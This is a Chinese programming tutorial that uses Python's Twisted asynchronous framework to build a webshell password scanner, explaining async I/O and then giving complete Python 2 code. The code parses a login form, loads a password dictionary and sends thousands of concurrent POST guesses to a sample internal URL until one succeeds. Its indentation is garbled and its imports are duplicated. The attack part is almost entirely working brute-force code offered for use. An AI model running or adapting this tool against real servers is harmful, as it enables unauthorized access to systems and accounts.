python Twisted框架入门:python实现webshell密码扫描器

发布时间:2020-10-03编辑:脚本学堂
Python中Twisted框架实现webshell密码扫描器的方法,python编程中用Twisted框架的异步通信机制实现密码扫描工具,供大家学习参考。

windows中得iocp技术,即异步通信,python中的twisted技术用法。

iocp即异步通信技术,是windows系统中现在效率最高的一种选择,异步通信顾名思义即与同步通信相对,平时写的类似socket.connect accept等都属于此范畴,同样python中得urlopen也是同步的(为什么提这个,是因为和后面的具体实现有关),总之,平时写的绝大多数socket,http通信都是同步的。

同步的程序优点是好想,好写。缺点大家都应该感受到过,比如在connect的时候,recive的时候,程序都会阻塞在那里,等上片刻才能继续前进。
异步则是另一种处理思路,类似于xml解析的sax方法,换句话说,就是当面临conncet,recive等任务的时候,程序先去执行别的代码,等到网络通信有了结果,系统会通知你,然后再去回调刚才中断的地方。

1、页面解析,webshell密码自动post,必然涉及到页面解析问题,即如何去找到页面中form表单中合适的input元素并提交,其中包括了hidden的有value,password的需要配合字典。
具体实现靠的是SGMLParser

2、正常的页面请求,利用了urlopen(为了使用cookie,实际使用的是opener),片段:
 

复制代码 代码示例:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
req = urllib2.Request(url, urllib.urlencode(bodyfieleds))  
resp = opener.open(req, timeout=60)  
 
strlist = resp.read()
 

代码简单,这就是python的魅力,bodyfieleds即为post的参数部分,是一个字典。

3、异步的页面请求,这里用了twisted的getpage片段:
 

复制代码 代码示例:
self.PostDATA[self.passw] = passl
  #print temp
zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostDATA), headers=self.headers)
zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl) 
 

可以看到如何利用getPage去传递Post参数,以及header(cookie也是防盗header里面的)
以及自定义的Callback函数,可以添加写需要的参数也传过去,这里使用了url和pass。

4、协程并发,代码:
 

复制代码 代码示例:
def InitTask(self):
    for passl in self.passlist[:]:
 d = self.addURL(passl)
 yield d
 
def DoTask(self):
    deferreds = []
    coop = task.Cooperator()
    work = self.InitTask()
    for i in xrange(self.ThreadNum):
 d = coop.coiterate(work)
 deferreds.append(d)
    dl = defer.DeferredList(deferreds)
 

就是这些了。效率上,我在网络通信较好的情况下,40s可以发包收包大致16000个。

代码:
 

复制代码 代码示例:

# -*- coding: utf-8 -*-
 #coding=utf-8
  
 #
 from twisted.internet import iocpreactor
 iocpreactor.install()
 from twisted.web.client import getPage
 from twisted.internet import defer, task
 from twisted.internet import reactor
 import os
 from httplib import HTTPConnection
 import urllib  
 import urllib2  
 import sys
 import cookielib
 import time  
 import threading
 from Queue import LifoQueue
 #import httplib2
 from sgmllib import SGMLParser 
 import os
 from httplib import HTTPConnection
 import urllib  
 import urllib2  
 import sys
 import cookielib
 import time  
 import threading
 from Queue import LifoQueue
 from sgmllib import SGMLParser 
  
 class URLLister(SGMLParser): 
   def __init__(self):
SGMLParser.__init__(self)
self.input = {}
   def start_input(self, attrs): 
#print attrs
 
for k, v in attrs:
  if k == 'type':
    type = v
  if k == 'name':
    name = v
  if k == 'value':
    value = v
if type == 'hidden' and value != None:
  self.input[name] = value
if type == 'password' :
  self.input['icekey'] = name
  
 class webShellPassScan(object):
   def __init__(self, url, dict):
self.url = url
self.ThreadNum = 10
self.dict = dict
   def getInput(self, url):
html, c = self.PostUrl(url, '')
parse = URLLister()
parse.feed(html)
return parse.input
 
   def PostUrl(self, url, bodyfieleds):
try:  

  cj = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  req = urllib2.Request(url, urllib.urlencode(bodyfieleds))  
  resp = opener.open(req, timeout=60) 
  
  strlist = resp.read()
  cookies = []
  for c in cj:
    cookies.append(c.name + '=' + c.value)
   
  return strlist, cookies
except :

  return ''
 
  
   def parse_page(self, data, url, passk):
#print url
 
self.TestNum = self.TestNum + 1
if data != self.sret and len(data) != 0 and data != 'iceerror':
  self.timeEnd = time.time()
  print 'Scan Password End :' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timeEnd))
  print 'total Scan Time:' + str((self.timeEnd - self.timeStart)), 's'
  print 'total Scan Passwords:' + str(self.TestNum)
  print "*************************the key pass***************************n"
  print passk 
  print "*************************the key pass***************************n"
  reactor.stop()
  
if self.TestNum % 1000 == 0:
 #print TestNum
 sys.stdout.write('detect Password Num:' + str(self.TestNum) + 'n')
 sys.stdout.flush()
  
def fetch_error(self, error, url, passl):
self.addURL(passl)
   def run(self):
  
  self.timeStart = 0
  self.timeEnd = 0
  self.TestNum = 0
  self.sret = ''
  print 'nndetect the WebShell URL:' + self.url
  self.PassNum = 0

  self.timeStart = time.time()
  print 'Scan Password Start :' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timeStart))
  filepath = os.path.abspath(os.curdir)
  file = open(filepath + "" + self.dict)
  self.passlist = []
   
  for lines in file: 
    self.passlist.append(lines.strip())
    #print lines.strip() 
  file.close()
  PassNum = len(self.passlist)
  print 'get passwords num:' + str(PassNum)
   
  inputdic = self.getInput(self.url)
  self.passw = inputdic['icekey']
  del inputdic['icekey']
  self.PostDATA = dict({self.passw:'icekey'}, **inputdic)
  self.sret, cookies = self.PostUrl(self.url, self.PostDATA) 
  self.headers = {'Content-Type':'application/x-www-form-urlencoded'}
  self.headers['cookies'] = cookies
  print 'cookies:' + str(cookies)
   
  self.DoTask()
  #self.DoTask2()
  #self.DoTask3()
  print 'start run'
  self.key = 'start'
  reactor.run()
   
   def InitTask(self):
for passl in self.passlist[:]:
  d = self.addURL(passl)
  yield d
 
  
   def InitTask2(self):
for passl in self.passlist[:]:
  d = self.sem.run(self.addURL, passl)
  self.deferreds.append(d)
   
   def InitTask3(self):
for passl in self.passlist[:]:
  d = self.addURL(passl) 
  self.deferreds.append(d)
  
   def DoTask(self):
deferreds = []
coop = task.Cooperator()
work = self.InitTask()
for i in xrange(self.ThreadNum):
  d = coop.coiterate(work)
  deferreds.append(d)
dl = defer.DeferredList(deferreds)
#dl.addErrback(self.errorCall)
#dl.addCallback(self.finish)
 
   def DoTask2(self):
 
self.deferreds = []
self.sem = defer.DeferredSemaphore(self.ThreadNum)
self.InitTask2()
dl = defer.DeferredList(self.deferreds)
  
def DoTask3(self):

self.deferreds = []
  
self.InitTask3()
dl = defer.DeferredList(self.deferreds)
 
   def addURL(self, passl):
 
self.PostDATA[self.passw] = passl
  #print temp
zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostDATA), headers=self.headers)
zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl) 

return zs
  
a = webShellPassScan('http://192.168.0.2:8080/f15.jsp', 'source_new.txt')
a.run()